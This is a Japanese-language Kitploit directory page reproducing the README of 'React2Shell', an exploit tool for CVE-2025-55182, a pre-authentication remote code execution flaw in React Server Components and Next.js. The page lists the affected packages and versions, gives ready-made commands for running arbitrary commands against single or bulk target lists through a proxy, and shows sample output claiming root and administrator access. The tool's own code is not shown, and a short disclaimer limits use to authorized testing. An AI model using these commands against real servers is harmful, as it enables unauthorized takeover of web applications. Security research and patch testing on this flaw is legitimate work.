Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
ツール/GitHubGitHub/ankitspandey07/react2shell
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツール
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

リポジトリを見る
139ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

@#React2Hell — CVE-2025-55182 Exploit

🔥 Next.js / React Server Remote Code Execution (RCE) エクスプロイト

█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 概要

React2Hell は、Next.js および React Server Actions に影響する重大なリモートコード実行脆弱性 CVE-2025-55182 をテスト・悪用するための強力なエクスプロイトツールです。

React Server Components バージョン 19.0.0、19.1.0、19.1.1、19.2.0 には、認証前のリモートコード実行脆弱性が存在します。影響を受けるパッケージは react-server-dom-parcel、react-server-dom-turbopack、react-server-dom-webpack です。脆弱性のあるコードは、Server Function エンドポイントへの HTTP リクエストからペイロードを安全でない方法でデシリアライズします。


✨ 特徴

  • 🧨 リモートコード実行 (RCE)
  • 🌐 単一URL / 複数URLスキャン
  • 🧩 カスタムコマンド実行
  • 🕵️‍♂️ プロキシ対応ステルスモード
  • ⚡ 高速、信頼性が高く、使いやすい

📌 使用方法

単一ターゲットモード

python Scanner.py -u https://target.com -c "whoami"

複数ターゲット(ファイルから)

python Scanner.py -l urls.txt -c "whoami"

HTTPプロキシ使用(Burp Suite)

python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

HTTPSプロキシ使用

python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt の例

http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ 出力例

PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ 免責事項

このツールは教育およびセキュリティ研究目的でのみ作成されています。 明示的な許可なくシステムに使用しないでください。 あなたの行動はあなた自身の責任です。


⭐ プロジェクトをサポート

このエクスプロイトが役立ったなら、GitHub で ⭐ を残すことを検討してください ❤️


👤 作者

Ankit Pandey; GitHub: https://github.com/Ankitspandey07

このツールは、すべてのステップで学び続けることを大切にする、誇り高く情熱的なペネトレーションテスターによって 🔥 を使って作られました。

ツールをダウンロード